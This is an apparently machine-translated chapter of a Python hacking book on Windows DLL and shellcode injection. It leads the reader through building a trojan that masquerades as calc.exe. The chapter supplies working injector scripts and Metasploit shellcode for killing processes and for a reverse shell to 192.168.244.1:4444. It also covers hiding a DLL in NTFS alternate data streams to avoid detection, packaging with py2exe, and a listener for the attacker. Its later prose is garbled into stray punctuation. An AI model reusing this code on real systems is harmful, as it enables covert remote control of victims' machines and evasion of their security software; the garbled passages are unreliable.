Gray Hat Python - DLL and Code Injection

Intro

Sometimes, when you reverse or attack a program, it is useful to be able to download and execute your code in the context of the process being studied. Whether you steal password hashes or gain access to the remote desktop of the target system, code injection and dll libraries provide powerful capabilities. We will create some simple utilities on Python that will allow you to use both methods. These methods should be included in the arsenal of each developer of programs, exploits, shellcodes and pentesters. We will use DLL injection to launch a popup window inside another process. We will also use code injection to test the shell code designed to destroy any process based on its PID. At the end of the chapter, we will create and compile Trojan (with backdoor functionality) completely written in Python. To a large extent, he will rely on the implementation of the code and the use of some other hidden tactics that every good backdoor should use. Let's start by looking at the topic of creating remote threads that are the basis for both implementation methods.

7.1 Creating remote streams

There are some major differences between DLL injection and code injection, however, both methods are achieved in the same way — by creating a remote thread. The remote thread is created using the CreateRemoteThread () [1] function of the Win32 API, which is exported from kernel32.dll . It has the following prototype:

HANDLE WINAPI CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId ); 

Do not worry, she has many parameters, but they are all intuitive. The first parameter, hProcess, should be familiar to you. This is the handle to the process in which we run the thread. The lpThreadAttributes parameter simply sets the security descriptor for the newly created thread and indicates whether the thread descriptor can be inherited by child processes. We will set its value to NULL, which will give the non-inherited flow descriptor and default security descriptor. The dwStackSize parameter simply sets the stack size of the thread being created. We will set it to zero, which will give the default size, which is already used by the process. The next parameter lpStartAddress is one of the most important. It indicates where in memory the thread will begin its execution. It is extremely important to set this address correctly so that the code needed to facilitate implementation is executed. The next parameter, lpParametr, is almost as important as the previous one. It allows you to provide a pointer to a variable that is passed to the stream function specified in lpStartAddress. At first it may look confusing, but very soon you will see how important this parameter is to perform the DLL injection. The dwCreationFlags parameter determines how the stream will be started. We will always set it to zero, which means that the thread will be executed immediately, immediately after creation. Feel free to check the MSDN documentation for other values ​​that the dwCreationFlags parameter supports. The lpThreadId parameter is the last one. It is filled with the identifier (ID) of the newly created stream.

')

Now, when you understand the main function call responsible for creating the implemented code, we explore the issue of using it to inject the DLL into the remote process, and then gradually move on to the implementation of the shell code. The procedure for creating a remote thread, and ultimately the execution of our code, is slightly different for each case (DLL and shell code injection), so we will demonstrate its use twice to cover all the differences.



7.1.1 DLL implementation



The introduction of the DLL for quite a long time was used for both good and evil. Wherever you look, you’ll see a DLL injection everywhere. From unusual Windows shell extensions to malware stealing your banking information. DLL implementation everywhere. Even security products inject their DLLs to track processes exhibiting malicious activity. The whole point in using a DLL injection is that we can compile a binary file, load it into the process and execute it as part of the process. This is very useful, for example, to bypass software firewalls that allow only certain applications to make outgoing connections. We are exploring this topic a bit when writing a DLL-injector on Python, which will allow us to inject the DLL-library into any process we choose.



To load DLLs into the Windows process memory, you need to use the LoadLibrary () function, which is exported from kernel32.dll . It has the following prototype:

 HMODULE LoadLibrary( LPCTSTR lpFileName ); 

The lpFileName parameter is just let it to the DLL that you want to load. We need to force the remote process to call LoadLibraryA with a pointer to a string containing the path to the loaded DLL. The first step is to find out where the LoadLibraryA function is located. Then write the name of the loaded DLL. When we call CreateRemoteThread (), we specify in the lpStartAddress parameter the address of the LoadLibraryA location, and in the lpParameter we place the location address of the “path (name) to the DLL”. When CreateRemoteThread () starts executing, it will call LoadLibraryA, as if the remote process made a request to load the DLL itself.



NOTE: The DLL for the deployment test is in the source file for this book, which you can download at www.nostarch.com/ghpython.htm . The source code of the DLL is also inside.



Let's go to the code. Open a new Python file, name it dll_injector.py and enter the following code.



dll_injector.py

 import sys from ctypes import * PAGE_READWRITE = 0x04 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) kernel32 = windll.kernel32 pid = sys.argv[1] dll_path = sys.argv[2] dll_len = len(dll_path) # Get a handle to the process we are injecting into. h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) if not h_process: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0) (#1): # Allocate some space for the DLL path arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE) (#2): # Write the DLL path into the allocated space written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written)) (#3): # We need to resolve the address for LoadLibraryA h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") h_loadlib = kernel32.GetProcAddress(h_kernel32,"LoadLibraryA") (#4): # Now we try to create the remote thread, with the entry point set # to LoadLibraryA and a pointer to the DLL path as its single parameter thread_id = c_ulong(0) if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)): print "[*] Failed to inject the DLL. Exiting." sys.exit(0) print "[*] Remote thread with ID 0x%08x created." % thread_id.value 

In the first step (# 1), you need to allocate enough memory to save the path (path) of the DLL being injected, and then write this path to the newly allocated memory (# 2) . Then we need to find the location address of the LoadLibraryA function (# 3) in order to pass it to the CreateRemoteThread () (# 4) function call. As soon as the created thread starts to execute, our embedded DLL should load into the attacked process, after which you will see a pop-up dialog box indicating that the deployment was successful. Use the script as below:

 ./dll_injector <PID> <Path to DLL> 

Now we have a good example of how to implement a DLL. And although the embedded DLL does not carry the payload, it is important for us to understand the implementation technique itself. Now let's move on to code injection!



7.1.2 Code Implementation



Let's move on to something more insidious. The implementation of the code allows us to insert a raw shellcode into the running process with its immediate execution in memory without leaving any traces on the disk. This is also what makes it possible for post-exploitation.



We will take a simple piece of shellcode that simply completes the process with a specific PID. This will allow you to go to the remote process and kill the process from which you originally performed, which will help you cover your tracks.



This will be a key feature of Troyan, which we will create at the end. Also, to meet your needs, we will show you how to safely replace pieces of shellcode so that you can make it a bit more modular.



To get the shell code of the killing processes, we will visit the Metasploit project home page and use their convenient shell code generator. If you have not used it before, please contact metasploit.com/shellcode and play with it. In our case, I used the generator to create the Windows Execute Command shellcode, which is shown in Listing 7-1. The corresponding settings are also shown there:



Listing 7-1: A shell-code killer process, generated using the Metasploit project online generator.

 /* win32_exec - EXITFUNC=thread CMD=taskkill /PID AAAAAAAA Size=152 Encoder=None http://metasploit.com */ unsigned char scode[] = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" "\x83\xc0\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff" "\xe7\x74\x61\x73\x6b\x6b\x69\x6c\x6c\x20\x2f\x50\x49\x44\x20\x41" "\x41\x41\x41\x41\x41\x41\x41\x00"; 

Now that we have a shellcode, it's time to return to programming and demonstrate the work of the implemented code. Open a new Python file, name it code_injector.py and enter the following code:



code_injector.py

 import sys from ctypes import * # We set the EXECUTE access mask so that our shellcode will # execute in the memory block we have allocated PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) kernel32 = windll.kernel32 pid = int(sys.argv[1]) pid_to_kill = sys.argv[2] if not sys.argv[1] or not sys.argv[2]: print "Code Injector: ./code_injector.py <PID to inject> <PID to Kill>" sys.exit(0) #/* win32_exec - EXITFUNC=thread CMD=cmd.exe /c taskkill /PID AAAA #Size=159 Encoder=None http://metasploit.com */ shellcode = \ "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" \ "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" \ "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" \ "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" \ "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" \ "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" \ "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" \ "\x83\xc0\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff" \ "\xe7\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b" \ "\x6b\x69\x6c\x6c\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00" (#1): padding = 4 - (len( pid_to_kill )) replace_value = pid_to_kill + ( "\x00" * padding ) replace_string= "\x41" * 4 shellcode = shellcode.replace( replace_string, replace_value ) code_size = len(shellcode) # Get a handle to the process we are injecting into. h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) if not h_process: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0) # Allocate some space for the shellcode arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) # Write out the shellcode written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written)) # Now we create the remote thread and point its entry routine # to be head of our shellcode thread_id = c_ulong(0) (#2): if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None, 0,byref(thread_id)): print "[*] Failed to inject process-killing shellcode. Exiting." sys.exit(0) print "[*] Remote thread created with a thread ID of: 0x%08x" % thread_id.value print "[*] Process %s should not be running anymore!" % pid_to_kill 

Some of the code is already familiar to you, but there are some interesting tricks here. The first thing to do is to replace the marker string (\ x41 \ x41 \ x41 \ x41 \ x00) in the shellcode (# 1) with the PID of the process that needs to be completed. Another noticeable difference is how we make the call to the CreateRemoteThread () function (# 2) . Now its lpStartAddress parameter points to the beginning of the shellcode. We also set the lpParameter to NULL, because we don’t need to pass anything to the function, instead we just want the thread to start executing the shellcode.



Before executing the script, run several cmd.exe processes, then get the corresponding PIDs and only after that execute the script as shown below:

 ./code_injector.py <PID to inject> <PID to kill> 

After executing the script, with the appropriate command line arguments, you will see the successfully created stream (the script will return the stream ID). You should also note that the cmd.exe process you selected has been killed.



Now you know how to load and execute shell code in another process. This is useful not only when setting up callback functions using a shellcode, but also when hiding your tracks, since you will not have any code on the disk. Now we use part of the learned information and create a backdoor that will give you remote access to the attacked machine at any time when it will be executed on it. Let's move to the side of evil!

7.2 On the evil side

We use the skills we have acquired for evil intentions. Now we will create a small backdoor that can be used to gain control over the system at any time during its execution on it. When our executable starts its execution, we will launch the original program that the user wanted to launch (for example, we will call our binary calc.exe , and the original calc.exe and transfer it to a known place). When the second process is loaded (the original calc.exe ), we will inject a code into it that will link us to the remote machine. After the shellcode is executed and we have the shell (communication with the remote machine), we will inject the second piece of code into the process from which the attack was carried out to kill it.



Give me a sec! Could we just let our calc.exe complete? In short, yes. But the completion of the process is a key technology supported by the backdoor. For example, you could combine your knowledge with the code you studied in earlier chapters and try to find working anti-viruses or firewalls to simply kill them. It is also important to be able to move from one process to another and at the same time be able to kill the process from which you just moved, if, of course, you no longer need it.



This part will also show how to compile the Python script into an EXE, and how to hide the DLL in the main executable file. Let's see how, using a small trick, you can create a DLL that will drive a hare along with our EXE file.



7.2.1 Hiding a file



In order to safely distribute the embedded DLL with our backdoor and not attract too much attention, we need a hidden way to store the file. We could use a wrapper (joinner), which takes two executable files (including DLLs) and joins them together into one file, but since this book is about hacking Python, we need to show a little more creativity.



To hide files inside executable files, abuse the existing features in the NTFS file system, called Alternate Data Streams (ADS). Alternative data streams first appeared in Windows NT 3.1 and were introduced as a means to interact with the Apple Hierarchical File System (HFS). ADS allows us to have one file on disk and store the DLL library in a stream that is attached to the main executable file. A stream is really nothing more than a hidden file that is attached to a file that you can see on disk.



When using an alternative data stream, we hide the DLL from the user's direct view. Without special tools, the computer user will not be able to see the content of ADS, which is perfect for us. In addition, a number of security products do not scan alternate streams properly, so we have a good chance of getting around happy and avoiding detection.



To use an alternate stream, we will need to add a colon and the file name of the hidden object to the existing file, as shown below:

 reverser.exe:vncdll.dll 

In this case, we get vncdll.dll , which is stored in an alternative data stream, which is attached to the file reverser.exe . Let's write a small script that will simply read and write alternate streams from a file. Open a new Python file, name it file_hider.py and enter the following code.



file_hider.py

 import sys # Read in the DLL fd = open( sys.argv[1], "rb" ) dll_contents = fd.read() fd.close() print "[*] Filesize: %d" % len( dll_contents ) # Now write it out to the ADS fd = open( "%s:%s" % ( sys.argv[2], sys.argv[1] ), "wb" ) fd.write( dll_contents ) fd.close() 

Nothing special - the first command line argument is the DLL that we need to read, and the second argument is the file, in which the DLL will be written to the alternate stream. We can use this simple script to store any kinds of files inside the executable file, we can also implement DLL libraries directly from ADS. Although we will not use the DLL injection in our backdoor, it will still be supported by it, so read on.



7.2.2 Code Backdoor



Let's start by creating our “execution redirection code”, which simply launches the application we have chosen. The reason for the name of the code “performing redirection” (execution redirection) is that we call our backdoor calc.exe, and move the original calc.exe to another location. When a user tries to launch a calculator, he accidentally launches our backdoor, which in turn launches a real calculator and thus does not arouse suspicion in the user. Notice that we include the my_debugger_defines.py file from Chapter 3 , which contains all the necessary constants and structures for creating the process. Open a new Python file, name it backdoor.py and enter the following code:



backdoor.py

 # This library is from Chapter 3 and contains all # the necessary defines for process creation #     3.    #      import sys from ctypes import * from my_debugger_defines import * kernel32 = windll.kernel32 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) # This is the original executable path_to_exe = "C:\\calc.exe" startupinfo = STARTUPINFO() process_information = PROCESS_INFORMATION() creation_flags = CREATE_NEW_CONSOLE startupinfo.dwFlags = 0x1 startupinfo.wShowWindow = 0x0 startupinfo.cb = sizeof(startupinfo) # First things first, fire up that second process # and store its PID so that we can do our injection kernel32.CreateProcessA(path_to_exe, None, None, None, None, creation_flags, None, None, byref(startupinfo), byref(process_information)) pid = process_information.dwProcessId 

The code is not too complicated, there is nothing new for you in it. Before proceeding to the implementation of the code - consider how we can hide this very embedded code. Let's add it directly to the backdoor code; just attach the code right after the process creation section. Our implementation function can work with both the implemented code and the DLL being implemented; just set “Parameter” to “1”, and in the “data” variable put the path to the DLL. Here we do not follow cleanliness, but act quickly and dirty. Let's add the embed feature to our backdoor.py file.



backdoor.py

 ... def inject( pid, data, parameter = 0 ): # Get a handle to the process we are injecting into. h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) if not h_process: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0) arg_address = kernel32.VirtualAllocEx(h_process, 0, len(data), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, data, len(data), byref(written)) thread_id = c_ulong(0) if not parameter: start_address = arg_address else: h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") start_address = kernel32.GetProcAddress(h_kernel32,"LoadLibraryA") parameter = arg_address if not kernel32.CreateRemoteThread(h_process,None, 0,start_address,parameter,0,byref(thread_id)): print "[*] Failed to inject the DLL. Exiting." sys.exit(0) return True 

Now our backdoor supports the implementation function, which can handle both “code injection” and “DLL injection”. Now it's time to insert the shell code, which consists of two parts. One part is designed to provide a "shell" (a shell for communicating with the attacker), and the other to complete the processes. Let's continue to add code to our backdoor.



backdoor.py

 ... # Now we have to climb out of the process we are in # and code inject our new process to kill ourselves #/* win32_reverse - EXITFUNC=thread LHOST=192.168.244.1 LPORT=4444 Size=287 Encoder=None http://metasploit.com */ connect_back_shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" \ "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" \ "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" \ "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" \ "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" \ "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" \ "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" \ "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" \ "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" \ "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68" \ "\xc0\xa8\xf4\x01\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9" \ "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" \ "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3" \ "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" \ "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" \ "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6" \ "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6" \ "\xff\x77\xfc\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0" inject( pid, connect_back_shellcode ) #/* win32_exec - EXITFUNC=thread CMD=cmd.exe /c taskkill /PID AAAA #Size=159 Encoder=None http://metasploit.com */ our_pid = str( kernel32.GetCurrentProcessId() ) process_killer_shellcode = \ "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" \ "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" \ "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" \ "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" \ "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" \ "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" \ "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" \ "\x83\xc0\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff" \ "\xe7\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b" \ "\x6b\x69\x6c\x6c\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00" padding = 4 - ( len( our_pid ) ) replace_value = our_pid + ( "\x00" * padding ) replace_string= "\x41" * 4 process_killer_shellcode = process_killer_shellcode.replace( replace_string, replace_value ) # Pop the process killing shellcode in inject( our_pid, process_killer_shellcode ) 

Good!Pass the process ID (PID) to the backdoor and inject the shellcode into the process that we spawned (calc.exe) . . , , , , , - . , , . . , , (), , .. : , , , Python, ? , py2exe , Windows, .. exe-.



7.2.3 py2exe



py2exe [2] , Python Windows. , , . . , setup.py .



setup.py

 # Backdoor builder from distutils.core import setup import py2exe setup(console=['backdoor.py'], options = {'py2exe':{'bundle_files':1}}, zipfile = None, ) 

, . , . «console» – , . «options» «zipfile» Python DLL . , , , , . , my_debugger_defines.py , backdoor.py setup.py . , :

 python setup.py py2exe 

, dist build . dist backdoor.exe . calc.exe . calc.exe «C:\WINDOWS\system32\» «C:\». calc.exe «C:\WINDOWS\system32\». , , , . Python, backdoor_shell.pyand enter the following code.



backdoor_shell.py

 import socket import sys host = "192.168.244.1" port = 4444 server = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) server.bind( ( host, port ) ) server.listen( 5 ) print "[*] Server bound to %s:%d" % ( host , port ) connected = False while 1: #accept connections from outside if not connected: (client, address) = server.accept() connected = True print "[*] Accepted Shell Connection" buffer = "" while 1: try: recv_buffer = client.recv(4096) print "[*] Received: %s" % recv_buffer if not len(recv_buffer): break else: buffer += recv_buffer except: break # We've received everything, now it's time to send some input command = raw_input("Enter Command> ") client.sendall( command + "\r\n\r\n" ) print "[*] Sent => %s" % command 

This is a very simple socket server that just waits for a connection and reads / writes into the socket. Start the server, with a set of host and port variables for your environment. Then run calc.exe ( ). , - . , CTRL-C, . , dir, cd type, - Windows. , . . ; . Python , .



, DLL- . , . . , open source .



Links



[1] See MSDN CreateRemoteThread Function (http://msdn.microsoft.com/en-us/library/ms682437.aspx)



[2] For the py2exe download, go to (http://sourceforge.net/project/showfiles.php?group_id=15583)



A source